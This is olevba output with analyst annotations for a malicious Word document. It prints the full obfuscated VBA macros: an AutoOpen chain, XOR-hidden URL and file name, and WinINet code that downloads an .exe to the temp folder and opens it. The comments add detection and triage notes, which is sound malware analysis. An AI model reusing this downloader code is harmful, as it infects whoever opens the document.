- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- car015890001.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: car015890001.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: car015890001.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' InIn is a one-line trampoline: it only calls D22D22D22D22, which is defined
- ' in the PIDLE0 module of this same document.
- Sub InIn()
- D22D22D22D22
- End Sub
- ' autoopen is the auto-executable entry point that olevba reports as AutoExec:
- ' Word runs it when the document is opened with macros enabled.
- ' Call chain from here: autoopen -> InIn -> D22D22D22D22 -> D24D24D24D24 ->
- ' C25C25C25 -> C6C6C6 (the routine that downloads a file and opens it).
- Sub autoopen()
- InIn
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO FILE6.bas
- in file: car015890001.doc - OLE stream: u'Macros/VBA/FILE6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module-level constants consumed by the download routine C16C16C16.
- Option Explicit
- ' Not referenced by any macro code visible in this listing.
- Public Const C1C1C1A = "D25D25D25D25"
- ' Size of the fixed-length read buffer and the byte count requested per
- ' InternetReadFile call.
- Private Const D1D1D1D1 = 8162
- ' Passed as the first argument of InternetOpenA (the agent string), so this
- ' literal is the HTTP User-Agent to look for in proxy logs.
- Private Const D2D2D2D2 As String = "D3D3D3D3D3"
- ' Second argument of InternetOpenA (access type); 1 is INTERNET_OPEN_TYPE_DIRECT.
- Private Const D4D4D4D4 = 1
- ' Flags argument of InternetOpenUrlA; &H4000000 is INTERNET_FLAG_NO_CACHE_WRITE,
- ' so the response is not written to the WinINet cache.
- Private Const D5D5D5D5 = &H4000000
- ' C16C16C16: downloader. Opens a WinINet session, has D15D15D15D15 open the
- ' XOR-decoded URL, reads the response in D1D1D1D1-sized chunks and writes the
- ' accumulated data to the path given in D6D6D6D6.
- ' Returns True when the accumulated length is non-zero; the Boolean default
- ' (False) is returned when the session or URL handle is 0.
- ' Analyst note: the only caller visible in this listing (C6C6C6) ignores the
- ' return value and goes on to open the written file.
- Public Function C16C16C16 _
- (ByVal D6D6D6D6 As String) As Boolean
- ' Handle width follows the host: LongPtr on 64-bit VBA7, Long otherwise.
- #If VBA7 _
- And Win64 Then
- Dim D7D7D7D7 As LongPtr, D8D8D8D8 As LongPtr
- #Else
- Dim D7D7D7D7 As Long, D8D8D8D8 As Long
- #End If
- Dim D10D10D10D10 As Long
- Dim C33C33C33 As String * D1D1D1D1, D9D9D9D9 As String
- Dim D11D11D11D11 As Integer, D12D12D12D12 As Double
- ' C2C2C2 is the alias for InternetOpenA; D7D7D7D7 receives the session handle.
- D7D7D7D7 = C2C2C2(D2D2D2D2, D4D4D4D4, vbNullString, vbNullString, 0)
- If D7D7D7D7 = 0 Then
- Exit Function
- End If
- ' FiGaMan is declared but never used.
- Dim FiGaMan As Boolean
- ' D15D15D15D15 stores the InternetOpenUrlA handle in D8D8D8D8 (ByRef); its
- ' Boolean result is ignored, the If body is empty.
- If D15D15D15D15(D8D8D8D8, D7D7D7D7) Then
- End If
- If D8D8D8D8 = 0 Then
- D12D12D12D12 = 0
- Else
- ' C3C3C3 is the alias for InternetReadFile; D10D10D10D10 receives the number
- ' of bytes read by each call.
- C3C3C3 D8D8D8D8, C33C33C33, D1D1D1D1, D10D10D10D10
- ' The first chunk is copied as the whole fixed-length buffer, not trimmed to
- ' D10D10D10D10, so the accumulated data is at least D1D1D1D1 characters long.
- D9D9D9D9 = C33C33C33
- Do While D10D10D10D10 <> 0
- C3C3C3 D8D8D8D8, C33C33C33, D1D1D1D1, D10D10D10D10
- ' Junk loop: the counter runs 110..111 and can never equal 1000, so End is
- ' never reached. Presumably padding against signature matching.
- Dim Z1z1Z1z1Z1z1 As Integer
- For Z1z1Z1z1Z1z1 = 110 _
- To 111
- If Z1z1Z1z1Z1z1 = 1000 Then _
- End
- Next Z1z1Z1z1Z1z1
- ' Later chunks are trimmed to the bytes actually read.
- D9D9D9D9 = D9D9D9D9 + Mid(C33C33C33, 1, D10D10D10D10)
- Loop
- ' D13D13D13D13 is a thin wrapper around Len.
- D12D12D12D12 = D13D13D13D13(D9D9D9D9): D11D11D11D11 = FreeFile
- ' Write the downloaded data to disk in binary mode at the caller-supplied path.
- Open D6D6D6D6 _
- For Binary Access Write _
- Lock Write _
- As #D11D11D11D11
- Put #D11D11D11D11, _
- , D9D9D9D9
- ' Second junk loop (111..112 never equals 2000).
- Dim S1s1S1s1S1s1S1s1 As _
- Long
- For S1s1S1s1S1s1S1s1 = 111 To 112
- If S1s1S1s1S1s1S1s1 = 2000 Then _
- End
- Next S1s1S1s1S1s1S1s1
- Close #D11D11D11D11
- End If
- ' C1C1C1 is the alias for InternetCloseHandle; both handles are released.
- C1C1C1 D8D8D8D8
- C1C1C1 D7D7D7D7
- D9D9D9D9 = ""
- If D12D12D12D12 Then
- C16C16C16 = True
- End If
- End Function
- ' D13D13D13D13: returns Len of its argument. It hides the Len keyword behind an
- ' obfuscated name; used by the downloader and by the XOR decoder C8C8C8.
- Public Function D13D13D13D13(D14D14D14D14 As String) As Long
- D13D13D13D13 = Len(D14D14D14D14)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PIDLE0.bas
- in file: car015890001.doc - OLE stream: u'Macros/VBA/PIDLE0'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' WinINet imports under obfuscated aliases (olevba flags "Lib" and lists
- ' wininet.dll as an IOC):
- '   C1C1C1 -> InternetCloseHandle
- '   C2C2C2 -> InternetOpenA
- '   C3C3C3 -> InternetReadFile
- '   C4C4C4 -> InternetOpenUrlA
- ' The first branch is the PtrSafe/LongPtr form for 64-bit VBA7 hosts; the #Else
- ' branch declares the same four functions with Long handles.
- ' Detection note: these declarations make the Office process itself issue the
- ' HTTP request, so the network connection originates from the Office process.
- #If VBA7 And Win64 Then
- Public _
- Declare _
- PtrSafe _
- Function _
- C1C1C1 Lib _
- "wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long
- Public _
- Declare _
- PtrSafe _
- Function _
- C2C2C2 Lib _
- "wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr
- Public _
- Declare _
- PtrSafe _
- Function _
- C3C3C3 Lib _
- "wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
- Public _
- Declare _
- PtrSafe _
- Function _
- C4C4C4 Lib _
- "wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr
- ' Same four imports with Long handles for other hosts.
- #Else
- Public Declare Function C1C1C1 Lib "wininet.dll" _
- Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long
- Public Declare Function C2C2C2 Lib "wininet.dll" _
- Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long
- Public Declare Function C3C3C3 Lib "wininet.dll" _
- Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
- Public Declare Function C4C4C4 Lib "wininet.dll" _
- Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long
- #End If
- ' C21C21C21: returns a COM object whose ProgID is recovered at run time by
- ' XOR-decoding the hex constant C10C10C10 with the key C9C9C9 (see C8C8C8).
- ' Applying that routine by hand yields "Scripting.FileSystemObject", which
- ' matches the FileExists, DeleteFile and GetSpecialFolder calls made on the
- ' returned object elsewhere in the document.
- ' The ProgID never appears in clear text, so a plain string search for it in
- ' the macro source finds nothing.
- Public Function C21C21C21() As Object
- Dim C22C22C22 As String
- C22C22C22 = C8C8C8(C9C9C9, C10C10C10)
- Set C21C21C21 = CreateObject(C22C22C22)
- End Function
- ' D22D22D22D22: second hop of the AutoOpen chain (called from InIn). Its only
- ' real work is the call to D24D24D24D24 at the end.
- Sub D22D22D22D22()
- Dim D23D23D23D23 As Long
- Dim D21D21D21D21S As Integer
- ' Junk loop: the counter runs 1101..1110 and can never equal 1111, so End is
- ' never executed.
- For D21D21D21D21S = 1101 To 1110
- If D21D21D21D21S = 1111 Then End
- Next D21D21D21D21S
- ' The value 111 is passed on, but D24D24D24D24 never reads its parameter.
- D23D23D23D23 = 111
- D24D24D24D24 (D23D23D23D23)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO IDL4.bas
- in file: car015890001.doc - OLE stream: u'Macros/VBA/IDL4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Obfuscated string table. Each value is a hex string whose bytes are XORed
- ' with characters of the key C9C9C9 by C8C8C8 at run time. The routine is a
- ' pure string transform, so the values can be recovered statically without
- ' running the document. olevba's --decode only reverses the hex layer.
- ' C18C18C18: ProgID handed to CreateObject in C6C6C6 before .Open is called;
- ' decoding by hand yields "Shell.Application".
- Public Const C18C18C18 = "102B262F2F6D023434282D2725372A2C2D"
- ' C19C19C19: appended to the temporary-folder path in C6C6C6; decodes to a
- ' backslash-prefixed file name with an .exe extension (the drop file name).
- Public Const C19C19C19 = "1F2A3737263B37756A716A213C26"
- ' C20C20C20: passed as the URL argument of InternetOpenUrlA in D15D15D15D15;
- ' decodes to an http:// URL (the download location). Decode offline to obtain
- ' the network indicator.
- Public Const C20C20C20 = "2B373733796C6C2B2A21292D2A2724312C36336D202B296B7772726C727277"
- ' C10C10C10: ProgID handed to CreateObject in C21C21C21; decoding by hand
- ' yields "Scripting.FileSystemObject".
- Public Const C10C10C10 = "1020312A33372A2A236A022D2826103A3037262E0C262E212730"
- ' C9C9C9: the repeating XOR key used for all four strings above.
- Public Const C9C9C9 = "CCCCCCCCDDDDDD"
- ' CADY: returns True when CAILEIGH.FileExists reports that the path CAILYN
- ' exists, otherwise False. Callers pass the object created by C21C21C21.
- Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
- If CAILEIGH.FileExists(CAILYN) Then
- CADY = True
- Else
- CADY = False
- End If
- End Function
- ' D15D15D15D15: opens the download URL. CALLA is the InternetOpenA session
- ' handle; the InternetOpenUrlA result is written to CALIDA (ByRef).
- ' The function always returns True, whether or not the handle is valid; the
- ' caller (C16C16C16) checks the handle for 0 itself.
- ' Two headers are compiled conditionally so the handle type matches the host
- ' (LongPtr on 64-bit VBA7, Long otherwise).
- #If VBA7 _
- And Win64 Then
- Public Function D15D15D15D15(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
- #Else
- Public Function D15D15D15D15(ByRef CALIDA As Long, CALLA As Long) As Boolean
- #End If
- Dim CALLIDORA As String
- ' The URL exists only after XOR-decoding C20C20C20 with the key C9C9C9.
- CALLIDORA = C8C8C8(C9C9C9, C20C20C20)
- ' C4C4C4 is the alias for InternetOpenUrlA; D5D5D5D5 (&H4000000) is passed as
- ' the flags argument, no extra headers are sent (vbNullString, length 0).
- CALIDA _
- = C4C4C4 _
- ( _
- CALLA, _
- CALLIDORA, vbNullString, _
- 0, _
- D5D5D5D5, 0)
- D15D15D15D15 = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO M.bas
- in file: car015890001.doc - OLE stream: u'Macros/VBA/M'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' C5C5C5: returns C23C23C23.GetSpecialFolder(2). The caller passes the object
- ' created by C21C21C21; for a FileSystemObject the value 2 selects
- ' TemporaryFolder, i.e. the current user's temp directory.
- Public Function C5C5C5(ByRef C23C23C23 As Object) As Object
- Set C5C5C5 = C23C23C23.GetSpecialFolder(2)
- End Function
- ' D24D24D24D24: indirection hop. The parameter CALEIGH is never read, and the
- ' string literal passed to C25C25C25 is ignored by that function as well.
- Sub D24D24D24D24(CALEIGH As Long)
- C25C25C25 ("CACACARDRDRDRD")
- End Sub
- ' C8C8C8: string de-obfuscator (olevba flags the Chr and Xor keywords here).
- '   D16D16D16D16 - XOR key string
- '   D17D17D17D17 - hex-encoded ciphertext, two hex digits per output character
- ' Returns the decoded string. The routine is deterministic and touches no
- ' external state, so it can be re-implemented offline to recover every hidden
- ' string (ProgIDs, file name, URL) for triage.
- Public Function C8C8C8(D16D16D16D16 As String, D17D17D17D17 As String) As String
- Dim D18D18D18D18 As Integer
- Dim D19D19D19D19 As Integer
- ' Junk loop: 1110..1111 never equals 1000, so End is never executed.
- Dim W1w1W1w1W1w1W1w1 As _
- Long
- For W1w1W1w1W1w1W1w1 = 1110 To 1111
- If W1w1W1w1W1w1W1w1 = 1000 Then _
- End
- Next W1w1W1w1W1w1W1w1
- ' Number of output characters = Len(hex string) / 2 (D13D13D13D13 wraps Len).
- Dim D30D30D30D30 As Long
- D30D30D30D30 = D13D13D13D13(D17D17D17D17)
- D30D30D30D30 = D30D30D30D30 / 2
- Dim D20D20D20D20 As Long
- Dim D21D21D21D21 As String
- For D20D20D20D20 = 1 _
- To _
- D30D30D30D30
- ' Ciphertext byte: the i-th pair of hex digits, parsed through "&H".
- D18D18D18D18 = Val("&H" & _
- (Mid$(D17D17D17D17, _
- (2 * D20D20D20D20) - 1, 2)))
- ' Key byte: the character at position (i Mod Len(key)) + 1, so the first output
- ' character is XORed with the SECOND key character and the key then repeats.
- D19D19D19D19 = Asc(Mid$(D16D16D16D16, _
- ((D20D20D20D20 Mod D13D13D13D13(D16D16D16D16)) + 1), 1))
- D21D21D21D21 = D21D21D21D21 + Chr(D18D18D18D18 Xor D19D19D19D19)
- Next D20D20D20D20
- C8C8C8 = D21D21D21D21
- End Function
- ' C25C25C25: indirection hop. The parameter C24C24C24 is never read; the
- ' function only calls C6C6C6 and returns nothing meaningful.
- Public Function C25C25C25(C24C24C24 As String)
- C6C6C6
- End Function
- ' C6C6C6: the payload routine at the end of the AutoOpen chain. In order it:
- '   1. creates the object returned by C21C21C21 (ProgID decoded from C10C10C10),
- '   2. asks it for special folder 2 (the temp folder) via C5C5C5,
- '   3. builds the drop path = that folder & the decoded C19C19C19 file name,
- '   4. deletes any existing file at that path,
- '   5. downloads to that path with C16C16C16,
- '   6. creates a second object (ProgID decoded from C18C18C18) and calls .Open
- '      on the drop path.
- ' Detection note: the observable sequence is an Office process making an
- ' outbound HTTP request, writing a new file into the user's temp directory and
- ' then having that file opened. Blocking macros in documents from untrusted
- ' sources stops the chain at autoopen.
- Public Function C6C6C6()
- Dim C7C7C7 As Object
- Set C7C7C7 = C21C21C21
- Dim C11C11C11 As Object
- Set C11C11C11 = C5C5C5(C7C7C7)
- Dim C15C15C15
- Dim C12C12C12
- C12C12C12 = C8C8C8(C9C9C9, C19C19C19)
- ' Concatenating the folder object relies on its default property to supply the
- ' path text - presumably Path; confirm against the FileSystemObject docs.
- C15C15C15 = C11C11C11 & C12C12C12
- ' Remove a previous copy so the binary write starts from a fresh file.
- If CADY(C7C7C7, C15C15C15) Then
- C7C7C7. _
- DeleteFile C15C15C15
- End If
- ' Download; the Boolean result is ignored (empty If body).
- If C16C16C16(C15C15C15) Then
- End If
- ' Existence check with an empty body: no effect on control flow.
- If CADY(C7C7C7, C15C15C15) Then
- End If
- ' Open the dropped file through the object whose ProgID is decoded from
- ' C18C18C18. This happens even when the download wrote nothing.
- Dim C17C17C17
- Set C17C17C17 = CreateObject _
- (C8C8C8 _
- (C9C9C9, C18C18C18))
- C17C17C17.Open C15C15C15
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: car015890001.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO UserForm2.frm
- in file: car015890001.doc - OLE stream: u'Macros/VBA/UserForm2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO UserForm3.frm
- in file: car015890001.doc - OLE stream: u'Macros/VBA/UserForm3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)